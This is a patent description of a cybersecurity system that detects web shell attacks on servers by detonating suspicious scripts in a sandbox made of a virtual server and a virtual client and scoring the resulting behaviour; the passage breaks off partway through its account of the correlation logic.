System and method for detecting and protecting against cybersecurity attacks on servers

Abstract
An electronic device for detecting threats within a server including a processor, and a memory communicatively coupled to the processor. The memory includes an inspection logic to receive a suspicious object for threat evaluation, and an analyzer logic including at least a first analyzer. The first analyzer, when processed by the processor, generates a virtual environment including a virtual client and a virtual server in communication over a virtualized communication link. The memory also includes a detonator logic configured to trigger the suspicious object. The analyzer logic loads and initializes the suspicious object into the virtual environment and further generates a first score based upon the triggering by the detonator logic that is indicative of a threat posed by the suspicious object. The memory may also include a reporting logic that compares a threat score to at least one threshold and in response may generate at least one remedial action.
Description
FIELD

Embodiments of the disclosure relate to the field of cybersecurity. More specifically, certain embodiments of the disclosure relates to a system, apparatus and method for protecting servers against specific cybersecurity attacks.


BACKGROUND

Over the last decade, malicious software (malware) has become a pervasive problem for Internet users and system administrators of network servers. Such malware may come in the form of web shell attacks that can compromise servers on a network. Normally, a web shell attack is perpetuated through a script written in a popular scripting language supported by a server, such as a web server connected to a targeted enterprise network. More specifically, in many cases, scripts associated with a web shell attack (hereinafter, “web shell script”) are written in a popular scripting languages known to be supported by a majority of web servers. Examples of popular scripting language that tend to be utilized by web shell scripts may include, but are not limited or restricted to PHP Hypertext Preprocessor (“PHP”), Python, Ruby, Perl, Active Server Pages (“ASP”), Java Server Pages (“JSP”) or Unix Shell Script.


In conducting a web shell attack, the web shell script may be loaded into the web server unnoticed, given that the web shell script could be uploaded in a dormant state as part of incoming Hypertext Transfer Protocol (HTTP) traffic. However, upon activation, the web shell script may enable a remote network device, operating as a client device, to gain acess to stored content within the web server and/or gain administrative control of the web server. This may allow the web shell script to illicitly extract content stored within the web server or stored within another network device connected to a private network that are accessible via the web server.


In almost all cases, the web shell attacks are challenging to detect and eliminate with conventional techniques because web shell scripts may remain dormant for a prolonged period of time and no additional software is necessary to commence a web shell attack. The web shell script may become active in response to a triggering event such as received commands from a remote network device utilized by a cybersecurity threat actor conducting a web shell attack. Once the web shell script becomes active and communications are established with the remote network device, the cybersecurity threat actor may add a new login account, which allows the threat actor to access this compromised web server in the future without the need to upload any new file or script or conduct a secondary web shell attack.


Also, web shell attacks can be challenging to detect because they may involve the creation of a backdoor into the server, where the backdoor may allow the threat actor to remotely access and gain administrative control of the compromised server at any time in the future without further re-uploading or exchanging content via HTTP traffic. Such administrative control may allow the threat actor to gain escalated privileges, compromising the web server and its contents, and obfuscate his or her activity as he or she attempts to gain access to another server within a network by laterally infecting that server with the web shell script. Additionally, the threat actor may take steps to cover his or her tracks by closing an exploited vulnerability within the server to prevent others from compromising that server or to take steps to avoid detection.


In summary, various types of conventional cybersecurity systems have been deployed in an attempt to detect malware, including detecting malicious files or other network content uploaded into a server during a web shell attack. In some cases, these conventional cybersecurity systems evaluated suspicious objects (e.g., content including a script and/or executable code suspected of being malicious) and made a determination whether the object may be construed as a cybersecurity threat or not (i.e. benign).





BRIEF DESCRIPTION OF THE DRAWINGS

Embodiments of the invention are illustrated by way of example and not by way of limitation in the figures of the accompanying drawings, in which like references indicate similar elements and in which:



FIG. 1 depicts an exemplary system diagram of a communication network including one or more cybersecurity appliances and cybersecurity agents with virtualized analysis systems to detect a cybersecurity threat such as a web shell attack.



FIG. 2 depicts an exemplary block diagram of a network deploying a cybersecurity agent configured to detect a cybersecurity threat such as a web shell attack.



FIG. 3 depicts an exemplary block diagram of a network deploying a cybersecurity appliance configured to detect a cybersecurity threat such as a web shell attack.



FIG. 4 depicts an exemplary embodiment of a virtualized analysis system implemented with a single analyzer comprising a virtual client and virtual server in accordance with an embodiment of the invention.



FIG. 5 depicts an exemplary embodiment of a virtualized analysis system implemented with a first analyzer featuring a virtual server and a second analyzer featuring a virtual client in accordance with an embodiment of the invention.



FIG. 6 is an exemplary flowchart of the process of detecting cyberattacks on servers utilizing a virtualized analysis system of FIG. 4 or FIG. 5.





DETAILED DESCRIPTION

Various embodiments of the disclosure relate to a cybersecurity system and/or process configured with a virtualized analysis system to detect and protect against cybersecurity threats (e.g., a cyberattack) on servers, including web shell attacks. Unlike conventional cybersecurity schemes, the cybersecurity system provides a virtualized platform to conduct hoslistic analytics on potential web shell script, including the bilateral communications between a virtual server and virtual client representative of a phsyical server and a client device. Herein, the virtualized analysis system includes a virtual server and a virtual client. A “virtual server” corresponds to a software representation of a physical server (e.g., processor, network interfaces, etc.) that may share physical hardware and software resources with other virtual servers. A “virtual client” corresponds to a software representation of physical resources associated with a client device (endpoint), such as a portable or stationary computer or smartphone for example, which is configured to communicate with the virtual server.


According to one embodiment of the disclosure, the cybersecurity system may include a first embodiment of the virtualized analysis system, which features a single (virtual) analyzer including both a virtual server and a virtual client. Monitoring logic is instantiated as part of the analyzer to monitor operability of the virtual server and the virtual client as well as the communications between the virtual server and the virtual client. For this analyzer, the virtual server may be provisioned in accordance with a software profile that supports processing of the suspicious object loaded into the virtual server, such as a web shell script for example, as well as communications with the virtual client. As an illustrative example, the virtual server may be provisioned to include one or more scripting engines (e.g., logic that alters script into executable code) that would effectuate processing of a web shell script. Similarly, the virtual client may be provisioned in accordance with a software profile with script applications, libraries, software development kits, etc.) to support communications with the virtual server.


More specifically, configured to detect web shell attacks or other types of cybersecurity threats, the cybersecurity system may be deployed as a cybersecurity agent or a cybersecurity appliance. According to one embodiment of the disclosure, the cybersecurity agent corresponds to software installed within a network device (e.g., server), operating in the foreground or background, that receives and analyzes objects to determine whether such objects are part of a cybersecurity threat (e.g., web shell attack). In particular, the cybersecurity agent may be configured to at least (i) receive, as input, an object (defined below) for analysis and meta-information associated with that object, and (ii) determine whether the object is “suspicious”. The term “suspicious” indicates that a corresponding object cannot be definitively determined to be benign or malicious.


For this embodiment of the disclosure, the cybersecurity agent may be configured to collect content and meta-information associated with the object and conduct a rule-based inspection to determine whether the received object is suspicious. As an illustrative example, logic within the cybersecurity agent may inspect, in accordance with one or more detection rules, content of the object and/or meta-information associated with the object to determine whether the object is a script or a particular script type. One of the detection rules may be directed to inspecting an extension associated with the object to determine whether the extension identifies the object as a known script. For instance, an object with a “.php” extention may be identified as a particular script, namely a PHP file to generate dynamic web pages with code that enables web pages to gather details entered by viewers as well as process and store that data for later retrieval (hereinafter, “PHP file”). As PHP files (and scripts in general) are widely used to initiate a web shell attack, the object would be deemed “suspicious” based on a single characteristic that the object is a script. Of course, various characteristics of the object, solely or in combination, may cause the object to be identified as “suspicious,” resulting in the object undergoing further analyses by an analyzer.


Besides suspicious object detection, the cybersecurity agent may be further configured to (iii) provision an analyzer to process that suspicious object; (iv) load the suspicious object into the virtual server; (v) conduct analytics of each suspicious object within the analyzer; and (vi) report the results of the analytics. As described, these operations (iii)-(vi) associated with the virtualized analysis system may be conducted by the cybersecurity agent; however, as an alternative embodiment, some or all of these operations (iii)-(vi) may be conducted by logic that is different from the cybersecurity agent, but is operating in cooperation therewith. For instance, the cybersecurity agent may detect and supply suspicious objects to the virtualized analysis system, but the virtualized analysis system operates within another network device, within a public cloud network, or the like.


Continuing with the illustrative example described above, upon identifying the object is a PHP file and thereby “suspicious,” the cybersecurity agent (or other logic) may provision the virtual server of the virtualized analysis system with a PHP scripting engine to translate contents the PHP file into executable code. Similarly, the cybersecurity agent may provision the virtual client with PHP software (e.g., application, libraries, software development kits, or the like) to support communications with the virtual server.


According to one embodiment of the disclosure, after provisioning the virtual server and the vitual client, the suspicious object is loaded into the virtual server prior to detonation of the suspicious object or as part of the detonation technique. The detonation of the suspicious object may include processing of the suspicious object and orchestrating (organizing and/or sequencing) communications between the virtual server and the virtual client (e.g., sending commands from the virtual client, responding to messages caused by the object operating on the virtual server, etc.). These communications may cause the object to perform unexpected, abnormal or inconsistent events indicative that the object is associated with a cybersecurity threat such as a web shell attack (e.g. increased privileges request message, commands outside normal operations of the suspicious object, increased downloading, attempted network connections, attempts reads from a secure memory location, etc.).


Additionally, the virtualized analysis system may examine the end states of the virtual server and virtual client to determine what changes have occurred within the virtualized analysis system after detonation. New login accounts or passcodes, backdoors, or other suspicious activity can be more easily determined via comparison between content representing the starting state of the virtualized analysis system and content representing the current state of the virtualized analysis system. Finally, the virtualized analysis system may detect additional “dropped” objects that are introduced as a result of the detonation (processes created during processing), which may then also be analyzed by the virtualized analysis system for the presence of malware. These additional analytics may be supportive in determining whether a suspicious object is part of a web shell attack, where the collective analytics may generate an overall threat assessment score to determine whether the suspicious object is malware, and more specifically, a web shell script.


To provide a more robust cybersecurity system, a first threat assessment score generated by the virtualized analysis system may be considered with a second threat assessment score produced by conventional static analytics of the same object. The second threat assessment score is determined from an inspection of the characteristics of the object, without its execution. These characteristics may be used to determine whether the object under analysis is associated with a cybersecurity threat such as a web shell attack. The static analytics also may be relied upon to assist in selecting a software profile for provisioning the virtual server and virtual client as described above, including selection of its particular operating system (OS) and application configuration, scripting engines, or the like. One example of static analytics is described in U.S. patent Ser. No. 10/033,747, entitled, “System and Method For Detecting Interpreter-Based Exploit Attacks” issued on Jul. 24, 2017, the disclosure of which is hereby incorporated by reference in its entirety.


In a number of embodiments, correlation logic implemented within the cybersecurity system can analyze these threat assessment scores to generate the “overall” threat assessment score, which can be evaluated against a set of rules and/or thresholds (e.g., prescribed thresholds or dynamic thresholds that may vary depending on a variety of metrics such as the object type or the software profile used in provisioning the virtualized analysis system). These rules and thresholds may be changed or updated periodically or aperiodically in response to, for example, various new threats or current conditions of the cybersecurity system. When a suspicious object is determined to be malicious, the cybersecurity system can take remedial action including, but not limited or restricted to, issuing an alert, deleting, or otherwise quarantining the malicious object.


In lieu of the cybersecurity system being configured to include a virtualized analysis system having a single analyzer as described above, the cybersecurity system may include a second embodiment of the virtualized analysis system, which features multiple (two or more) analyzers. For this embodiment of the virtualized analysis system, a first analyzer is provisioned to operate as a virtual server while a second analyzer is provisioned to operate as a virtual client. The provisioning of the first analyzer is conducted separately from the provisioning of the second analyzer. However, the overall operations of the virtualized analysis system would be consistent with a virtualized analysis system having the single analyzer.


According to another embodiment of the disclosure, the cybersecurity system may operate as a “cybersecurity appliance,” namely a network device configured to conduct analytics on one or more objects (defined below) to determine whether any of the objects constitute a cybersecurity threat such being part of a web shell attack. Similar to the operations of the cybersecurity agent described above, the cybersecurity appliance may be configured to receive, as input, objects for analysis and meta-information associated with those objects, and for each object, (i) determine whether the object is suspicious, (ii) provision the virtual machine(s) to process that suspicious object, (iii) load the suspicious object into a virtual server provisioned within the virtual machine(s), (iv) conduct analytics of suspicious object within the analyzer, and/or (v) report the results of the analytics.


It is understood that the cybersecurity system and process described herein provide for a more efficient and more successful method of detecting cybersecurity threats posed to any network device such as a server, including web shell attacks, through the use of a virtual client and virtual server. The monitoring of the virtual communication between the virtual client and virtual server, along with examining any subsequently created objects, and end-states can provide a more accurate threat assessment of suspicious objects, therein facilitating the practical application of providing more safety, uptime, and control to all types of networks including enterprise networks.


I. Terminology

In the following description, certain terminology is used to describe features of the invention. For example, in certain situations, the terms “logic” and “engine” are representative of hardware, firmware or software that is configured to perform one or more functions. As hardware, logic (or engine) may include circuitry such as one or more processors (e.g., a microprocessor, one or more processor cores, a programmable gate array, a microcontroller, an application specific integrated circuit, etc.), wireless receiver, transmitter and/or transceiver circuitry, semiconductor memory, combinatorial logic, or other types of electronic components.


As software, logic (or engine) may be in the form of one or more software modules, such as executable code in the form of an executable application, a script, an application programming interface (API), a subroutine, a function, a procedure, an applet, a servlet, a routine, source code, object code, a shared library/dynamic load library, or one or more instructions. These software modules may be stored in any type of a suitable non-transitory storage medium, or transitory storage medium (e.g., electrical, optical, acoustical or other form of propagated signals such as carrier waves, infrared signals, or digital signals). Examples of non-transitory storage medium may include, but is not limited or restricted to a programmable circuit; a semiconductor memory; non-persistent storage such as volatile memory (e.g., any type of random access memory “RAM”); persistent storage such as non-volatile memory (e.g., read-only memory “ROM”, power-backed RAM, flash memory, phase-change memory, etc.), a solid-state drive, hard disk drive, an optical disc drive, or a portable memory device. As firmware, the logic (or engine) is stored in persistent storage.


The term “malware” is directed to software (e.g., script such as a web shell script, process, application, routine, or series of instructions) that produces an undesirable behavior upon execution, where the behavior is deemed to be “undesirable” based on customer-specific rules, manufacturer-based rules, or any other type of rules formulated by public opinion or a particular governmental or commercial entity. This undesired behavior may include a communication-based anomaly or an execution-based anomaly that (1) alters the functionality of an electronic device executing that application software in a malicious manner; (2) alters the functionality of an electronic device executing that application software without any malicious intent; and/or (3) provides an unwanted functionality which is generally acceptable in other context.


The term “object” generally refers to content in the form of an item of information having a logical structure or organization that enables it to be classified for purposes of analysis for malware or an address (pointer) to where such content is stored. One example of the object may include an email message or a portion of the email message. Another example of the object may include a storage file or a document such as a PHP, ASP or JSP file or other dynamic file, a word processing document such as Word® document, or other information that may be subjected to cybersecurity analysis. The object may also include an executable such as an application, program, code segment, a script, dynamic link library “dll,” URL link, or any other element having a format that can be directly executed or interpreted by logic within the electronic device.


The term “transmission medium” may constitute a physical or virtual communication link between two or more systems. For instance, the transmission medium may correspond to a physical (wired or wireless) communication link between two or more network devices (defined below). The physical communication link may include electrical wiring, optical fiber, cable, bus trace, or a wireless channel using infrared, radio frequency (RF), or any other wired/wireless signaling mechanism. Alternatively, the transmission medium may correspond to a virtual communication link that provides logical connectivity between different logic (e.g., software modules).


The term “network device” should be generally construed as an electronic device with data processing capability and/or a capability of connecting to any type of network, such as a public network (e.g., Internet), a private network (e.g., a wireless data telecommunication network, a local area network “LAN”, etc.), or a combination of networks. Examples of a network device may include, but are not limited or restricted to, the following: a server or other stand-alone electronic device, cybersecurity appliance, a mainframe, a firewall, a data transfer device (e.g., router, switch, modem, bridge, etc.), an info-entertainment device, a vehicle, a medical device, a client device (endpoint) such as a laptop, a smartphone, a tablet, a desktop computer, a netbook, gaming console or gaming accessory, or any general-purpose or special-purpose, user-controlled electronic device. In many embodiments, the term “network device” may be used synonymously with the term “electronic device.”


The term “message” generally refers to signaling (wired or wireless) as either information placed in a prescribed format and transmitted in accordance with a suitable delivery protocol or information made accessible through a logical data structure such as an API. Hence, each message may be in the form of one or more packets, frame, or any other series of bits having the prescribed, structured format.


Lastly, the terms “or” and “and/or” as used herein are to be interpreted as inclusive or meaning any one or any combination. Therefore, “A, B or C” or “A, B and/or C” mean “any of the following: A; B; C; A and B; A and C; B and C; A, B and C.” An exception to this definition will occur only when a combination of elements, functions, steps or acts are in some way inherently mutually exclusive.


As this invention is susceptible to embodiments of many different forms, it is intended that the present disclosure is to be considered as an example of the principles of the invention and not intended to limit the invention to the specific embodiments shown and described.


II. General Architecture

Referring to FIG. 1, an exemplary system diagram of a communication network 100 is shown. The communication network 100 includes a plurality of network devices 120, 130, 140, 150 in communication over a network 110. As shown, network devices 130 and 140 correspond to cybersecurity appliances while each network device 120, 150 includes a cybersecurity agent 125, 155, respectively. The cybersecurity agent 125, 155 are loaded and executed on the network devices 120 and 150 to analyze objects and detect cybersecurity threats (e.g., malicious web shell script). The network 110 may encompass any type of network including, but not limited to, a public network (Internet) or a private network (e.g., a local area network). The network devices 120, 130, 140, 150 are communicatively coupled together via the network 110, albeit the network device 120 is implemented within a (customer) network 122 and network device 150 is coupled to the network 110 via another intermediary network 160.


According to one embodiment of the disclosure, each cybersecurity appliance 130 or 140 may be implemented as or on a stand-alone network device that is implemented with logic to detect a cybersecurity threat (e.g., potential infection of network by malware through a web shell attack). More specifically, each cybersecurity appliance (e.g., cybersecurity appliance 130) may be configured to receive, as input, one or more objects (e.g., object 170) for analysis. The cybersecurity appliance 130 may inspect the content of the object 170 and/or meta-information 175 associated with that object 170 to determine whether that object 170 is suspicious. This inspection may be conducted by inspection logic (see FIG. 3) within the cybersecurity appliance 130, where the inspection logic generates a threat assessment score based on the level of compliance (or non-compliance) of the inspected information with rules formulated to identify characteristics associated with known malicious objects and/or known benign objects. When the threat assessment value exceeds a first threshold, the object 170 is deemed “suspicious,” prompting a more detailed analysis of the object 170 within a virtualized analysis system as described below.


Each cybersecurity agent 125 or 155 may be implemented as software installed on a respective network device 120 or 150, where the software conducts run-time threat detection on an object in effort to determine whether the object is a cybersecurity threat (e.g., web shell attack). In particular, each cybersecurity agent (e.g., agent 125) may be configured, at least, to (i) receive, as input, an object 180 and/or meta-information 185 associated with that object 180 for analysis, and (ii) determine whether the object 180 is suspicious. Similar to the above-described operability of the cybersecurity appliance 130, the cybersecurity agent 125 may conduct a rule-based inspection of the content of the object 180 and/or meta-information 185 to determine whether that object 180 is suspicious. If so (e.g., the threat assessment value exceeds the first threshold), the object 180 is deemed “suspicious,” similarly causing a more detailed analysis of the object 180 within a virtualized analysis system described below.


As an illustrative example of the inspection process, a cybersecurity system 125/130 (e.g., the cybersecurity agent 125 or inspection logic within the cybersecurity appliance 130) may inspect, in accordance with one or more detection rules (not shown), content of the object 180/170 and/or meta-information 185/175 associated with the object 180/170 to determine whether the object 180/170 is a script or a particular script type. For example, one of the detection rules may conclude that the object 180/170 is deemed to be “suspicious” if the object's extension, being part of the meta-information 185/175, corresponds to a particular script (e.g., a “.php” extention identifying that the object is a PHP file widely used to conduct a web shell attack). Hence, upon inspection of the extension of the object 180/170 and uncovering a “.php” extension, the cybersecurity system 125/130 determines that the object 180/170 is “suspicious.” It is contemplated that the detection rules may be configured for use in identifying PHP files as described above, or even other script types (e.g., ASP or JSP files) included as part of the object 180/170.


Besides suspicious object detection, the cybersecurity agent 125 may be further configured to (iii) provision an analyzer to process that suspicious object 180; (iv) load the suspicious object 180 into the virtual server; (v) conduct analytics of at least the suspicious object 180 including an analyzer; and (vi) report the results of the analytics via the network 110. As described, these operations (iii)-(vi) may be conducted by the cybersecurity agent 125; however, as an alternative embodiment, some or all of these operations (iii)-(vi) may be conducted by logic that is different from the cybersecurity agent 125, but is operating in cooperation therewith. For instance, the cybersecurity agent 125 may perform real-time analysis of the content of the object 180 and/or its meta-information 185 to determine whether the object 180 is “suspicious;” however, the “behavioral” analytics of the object 180 may be conducted by one of the cybersecurity appliances 130 or 140, logic 195 within a public cloud network 190, or the like.


In a variety of embodiments, a customer network 145 may be in communication with an external cybersecurity appliance 140. These embodiments may be useful for situations where a customer network 145 is already established and cannot accommodate a direct integration with a cybersecurity appliance. In other embodiments, the cybersecurity appliance 140 may be a third party device licensed, leased, or otherwise provided to the customer network 145 for use. In still further embodiments, the cybersecurity appliance 140 may be positioned between the customer network 145 and the network 110, such that all incoming messages and network content traveling over the network 110 are inspected for cybersecurity threats before arriving within the customer network 145.


In numerous embodiments, the intermediary network 160 may be in communication with an external cybersecurity agent 155. In still additional embodiments, the intermediary network 160 may receive network content and pass along suspicious objects to the cybersecurity agent 155, which may perform analytics on the suspicious objects prior to saving or execution. In these cases, the intermediary network 160 may deploy servers or other network devices that feature logic (e.g., software, rules-based engine, etc.) that, under certain conditions, redirects network content to the cybersecurity agent 155. By way of example and not limitation, the intermediary network 160 may already have a cybersecurity system installed that functions but otherwise lacks the ability to successfully detect and/or eliminate web shell attacks. In these cases, the previously installed cybersecurity system of the intermediary network 160 may be communicatively coupled to the network device 150 and its cybersecurity agent 155 that can be tasked with supplementing the pre-installed cybersecurity system by evaluating scripts to detect a web shell attack. Such outsourcing of threat evaluation can be executed remotely and also be provided in a Software as a Service (“SaaS”) model.


In some embodiments, the transfer of suspicious objects may be done within a private enterprise network. As a result, the cybersecurity system may be configured to detect, monitor and analyze the transfer of suspicious objects between multiple network devices operating within a single customer network (east-west traffic). Likewise, the cybersecurity system may be configured to detect, monitor and analyze the transfer of suspicious objects residing in different networks devices, such as a first network device may be deployed within a customer network and a second network device may be deployed outside of the customer network (e.g., another local area network, a cloud network, etc.).


It would be understood by those skilled in the art that although certain embodiments are highlighted in discussion of FIG. 1, a wider variety of embodiments are possible and contemplated by this application. In fact, based on the desired application and layout, a mixture of customer networks and cybersecurity systems can be achieved in order to detect web shell attacks. Customer networks are described in more detail below.


Referring now to FIG. 2, an exemplary block diagram of the network 122 deploying the cybersecurity agent 125 installed within the network device 120 is shown. Herein, the network 122 features the network device 120 along with a plurality of network devices 2101-210N. As shown, the network devices 2101-210N (N≥1) are represented as servers; however, it is contemplated that these network devices may correspond to other types of electronic devices such as client devices. It should be understood that the number of servers within a network 122 may vary based on the type of network and application desired. Each of the servers 2101, 210N may be in communication with each other as well as to other network devices on the network 122.


As shown, the network 122 is in communication with the network 110 to receive one or more objects and/or their corresponding meta-information (e.g., object 180 and/or meta-information 185) directed to the network device 120. As shown, the network device 120 includes the cybersecurity agent 125, namely software installed within the network device 120 and operating in the foreground or background to detect cybersecurity threats such as web shell attacks. Additionally, the network device 120 may receive one or more objects (e.g., object 200) from one of the servers 2101-210N along with its corresponding meta-information 205 for analysis. The cybersecurity agent 125 is configured to receive and analyze the incoming objects 180, 200 to determine whether such objects are part of a cybersecurity threat (e.g., web shell attack). In particular, for analysis of object 180 for example, the cybersecurity agent 125 may be configured to at least (i) receive the object 180 for analysis and its associated meta-information 185, and (ii) determine whether the object 180 is suspicious based on the content of the object 180 and/or the meta-information 185.


As described above, the cybersecurity agent 125 may be configured to collect content and meta-information 185 associated with the object 180 and inspect the collected information for particular characteristics (e.g., content that is highly susceptible to web shell attacks such as a script, specific data patterns or sequences, deviations in messaging practices (structure, format or ordering informalities, increased messaging attempt, etc.)) that, individually or collectively, suggest that the object 180 is “suspicious.” Of course, it is contemplated that the “suspiciousness” determination may be made using the content of the object 180, where the meta-information 185 is only collected after the object 180 is deemed suspicious, where the meta-information 185 is provided with the object 180 to a virtualized analysis system 225.


As shown in detail in FIGS. 4-5 (identified as virtualized analysis system 400 and 500 therein), the virtualized analysis system 225 includes a virtual server (software representation of a physical server) communicatively coupled to a virtual client (software representation of physical resources associated with a client device). Herein, where the object 180 is deemed suspicious, the cybersecurity agent 225 may be further configured to provision the virtual server and virtual client within the virtualized analysis system 225 and load the suspicious object 180 into the virtualized analysis system 225.


The virtualized analysis system 225 detonates the suspicious object 180, and thereafter, monitors events that occur during the processing of the suspicious object 180. Herein, according to one embodiment of the disclosure, the detonation of the suspicious object 180 may include orchestrating communications between the virtual server and the virtual client (e.g., sending commands from the virtual client, responding to messages from the object, etc.), which may prompt the suspicious object 180 to perform unexpected, abnormal or inconsistent events indicative of a cybersecurity threat such as a web shell attack. Examples of these unexpected, abnormal or inconsistent events may include, but are not limited or restricted to an increased number of privilege request messages, receipt of commands outside normal operations of the suspicious object, increased attempts to download content from any of servers 2101-210N, attempted network connections, attempted reads from a secure memory location, or the like.


After denotation of the suspicious object 180, logic within the virtualized analysis system 225 monitors behaviors (events) occurring within the virtualized analysis system 225 (e.g., virtual server, virtual client, etc.) and conduct analytics on the monitored events. The analytics may involve analysis of events conducted by the virtual server and virtual client during processing of the suspicious object 180, especially an analysis of the events being communicated between the virtual server and the virtual client. After completion of the analytics, results may be reported to one or more administrators with suitable credentials to receive such results.


Additionally, the virtualized analysis system 225 may be configured to examine the end state of the virtualized analysis system, notably the virtual server and virtual client, to determine what changes have occurred within the virtualized analysis system 225 after detonation. Certain activities, such as the creation of new login accounts, changes to passcodes, backdoor creations, or other activities that attempt to alter access restrictions, can be more easily determined via comparison between the starting state of the virtualized analysis system 225 (virtual server, virtual client) versus its current states. Also, the virtualized analysis system 225 may detect additional “dropped” objects that are introduced as a result of the detonation (objects, such as processes or other scripts and/or files created during processing), which may then also be analyzed by the virtualized analysis system 225 for the presence of web shell script. These additional analytics may assist in the determination as to whether the suspicious object 180 constitutes a cybersecurity threat (e.g., part of a web shell attack). Each of these analytics (e.g., event analytics, state change analytics, and/or dropped object detection analytics) may generate a corresponding threat assessment score, and based on a collection of some or all of these analytics, the virtualized analysis system 225 may generate an overall threat assessment score to determine whether the suspicious object is malware, and more specifically, web shell script.


To provide a more robust cybersecurity system, the overall threat assessment score generated by the virtualized analysis system 225 may be combined with a threat assessment score generated by the cybersecurity agent 125 during inspection of characteristics of the object 180 and/or meta-information 185 during the determination as to whether the object 180 is “suspicious.”


In a number of embodiments, the cybersecurity agent 125 implemented within the network device 120 can utilize the above-described threat assessment scores to generate the “final” threat assessment score, which can be evaluated against a set of rules and/or thresholds (e.g., prescribed thresholds or dynamic thresholds that may vary depending on a variety of metrics such as the object type or the software profile used in provisioning the virtualized analysis system). These rules and thresholds may be changed or updated periodically or aperiodically in response to, for example, various new threats or current conditions of the cybersecurity system. When the suspicious object 180 is determined to be malicious, the cybersecurity agent 125 may cause the network device 120 to take remedial action including, but not limited or restricted to, issuing an alert, deleting, or otherwise quarantining the suspicious object 180.


In some embodiments, as shown, the cybersecurity agent 125 may be deployed within a network device that is not a server including, but not limited to, a mainframe, a firewall, a data transfer device (e.g., router, switch, modem, bridge, etc.) or a client device. In other embodiments, the cybersecurity agent 125 may be operated on one of the plurality of servers.


Referring to FIG. 3, an exemplary block diagram of a cybersecurity system deployed as a cybersecurity appliance in accordance with an embodiment of the invention is shown. The cybersecurity appliance 300 may be similar in architecture to the cybersecurity appliances 130, 140 depicted in FIG. 1. The cybersecurity appliance 300 comprises one or more processors (e.g., CPU) 310, which is coupled to communication input/output interfaces 330 as well as to a persistent memory system 320. According to one embodiment of the disclosure, the input/output (I/O) interface 330 may be implemented as a physical interface including one or more ports for wired connectors. Alternatively, the entire cybersecurity appliance 300 may be implemented as software, such as a cybersecurity agent (e.g., cybersecurity agent 125 depicted in FIG. 2) and the input/output interface 330 may be implemented as a digital communication logic between the cybersecurity agent 125 and other software interfaces. Additionally, or in the alternative, the I/O interface 330 may be implemented with one or more radio units or other transmission mediums for supporting wireless communications with other electronic devices.


Within the persistent memory system 320 of the embodiment depicted in FIG. 3, various logics may be provided including, but not limited to, inspection logic 340, rule/threshold update logic 345, analyzer logic 350, correlation logic 360, and reporting logic 365.


In various embodiments, the inspection logic 340 can be utilized to facilitate a preliminary analysis of objects (e.g., object 170 as shown in FIG. 1) for cybersecurity threats. According to one embodiment of the disclosure, the inspection logic 340 retrieves the object 170 and the meta-information 175 associated with the object 170. During or after retrieval, the inspection logic 340 may analyze the characteristics of the object 170 and/or its meta-information 175 (e.g., specific data of the object 170 and/or meta-information 175; specific patterns or sequences of this data, structure, format or ordering deviations, object type, etc.) and determine whether these characteristics comply with one or more detection rules 342 that are updated, based on historical cybersecurity threat information (from the cybersecurity appliance 130 and intelligence from other network devices or third-party systems to determine whether object 170 is “suspicious.”


The rule/threshold update logic 345 is responsible for the updating of one or more rule sets and parameters 344, which includes the detection rules 342 and prescribed thresholds 343 used in determining suspiciousness or maliciousness of an object under analysis. The rule sets and parameters 344 may be utilized by the inspection logic 340, analyzer logic 350, correlation logic 360 and/or reporting logic 365, as these rules/parameters may be used to control the functionality of these logic components. The rule sets and/or parameters 344 may be changed or updated periodically or aperiodically in response to, for example, various new cybersecurity threats or current conditions of the cybersecurity system.


As an illustrative example, referring still to FIG. 3, the inspection logic 340 may inspect, in accordance with one or more detection rules 342, an extension associated with the object 170 to determine whether the extension is associated with a known script, such as a “.php” extention to identify that the object is a particular script, namely a PHP file. As the PHP file are frequently used to conduct a web shell attack, the object type being a script would cause the inspection logic 340 to determine that the object 170 is “suspicious”.


Response to determining that the object 170 is suspicious, the inspection logic 340 may communicate with (e.g., generate a call to) the analyzer logic 350 to provision one or more virtualized analysis systems 355. In some some embodiments the virtualized analysis systems 355 may be provisioned and instantiated by the analyzer logic 350 and/or in some embodiments the virtualized analysis systems 355 may be persistent. According to one embodiment of the disclosure, the analyzer logic 350 is configured to either (i) receive information pertaining to the data type of the object 170 (hereinafter, “object data type”) or (ii) determine the object data type from the content of the object 170 and/or the meta-information 175. Based on the detected object data type, the the analyzer logic 350 may be configured to select a software profile that supports the processing of the suspicious object 170 and provision the virtual server and the virtual client within at least one of the virtualized analysis systems 355 with that software profile. For instance, where the object 170 includes a script, the virtual server within the virtualized analysis system 355 may be provisioned to include one or more scripting engines that effectuates processing of the script. Similarly, the virtual client may be provisioned in accordance with a software profile with script applications, libraries, software development kits, etc.) needed to support communications with the virtual server, or even upload the object 170 into the virtual server.


Stated differently, the analyzer logic 350 can be utilized to generate the virtualized analysis system(s) 355, each including one or more analyzers to evaluate events produced during processing of the object. In certain embodiments, the analyzer logic 350 may examine the object content for an object data type and select a virtual client and virtual server for use in the analyzer logic 350. Furthermore, in some embodiments, the analyzer logic 350 may also examine the meta-information 175 obtained contemporaneously to possibly select a better-suited set of analyzers than would have been selected by using the content from the object 170 alone.


Also, the analyzer logic 350 may generate multiple virtualized analysis systems 355, where at least one virtual component (virtual server or virtual client) for each virtualized analysis system 355 may be provisioned using a different software profile (e.g., different OSes or different versions of the same OS among the virtualized analysis systems 355, different web browser applications or different versions of the same web browser application among the virtualized analysis systems 355, and/or different scripting engines or different versions of the same scripting engine among the virtualized analysis systems 355). As a result, different virtualized analysis systems may be selected to analyze the object within multiple virtual environments. In this way, the analyzer logic 350 may employ multiple types of analyzers to evaluate the suspicious object 170. Additionally, it is contemplated that the multiple virtualized analysis systems may be identically provisioned if different analytic procedures (e.g., different time accelerated analyses based on time (clock) manipulation, different object loading schemes, etc.). Additionally, these multiple analyzers may be operated in a synchronous or asynchronous manner.


In more embodiments, the persistent memory 320 may also comprise correlation logic 360. Correlation logic 360 examines the analytic results from the analyzers within the virtual analysis system 355 and generates threat assessment scores for the analytic results. According to one embodiment of the disclosure, the threat assessment scores may be generated by examining the differences between the various analyzers. By way of example and not limitation, the analytic results can be generated from a variety of analyzers that were instantiated to simulate a number of different configuration settings within the virtual server and client programs. In this way, the threat assessment score data may be formatted and adapted to reflect that various differences in the processing results in the plurality of analyzers.


